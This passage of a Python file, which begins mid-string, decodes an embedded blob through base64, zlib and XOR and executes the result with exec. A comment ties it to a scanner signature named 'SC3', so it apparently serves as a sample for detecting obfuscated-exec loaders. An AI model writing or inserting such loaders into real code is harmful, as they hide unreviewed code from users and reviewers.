7MlQalWIZqjuIAMZRfLX34SeG0ntP16i6fpaNznSf4HHL54IviwMvburX5z1GRckarb/qJTGafSJJ+63YOs5ySU6PXL57GkRnFD2h50PWy/1BhrbFYbrDzB/mMY="
_K = bytes.fromhex("f8ab9740e73a82d0d8de3750")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
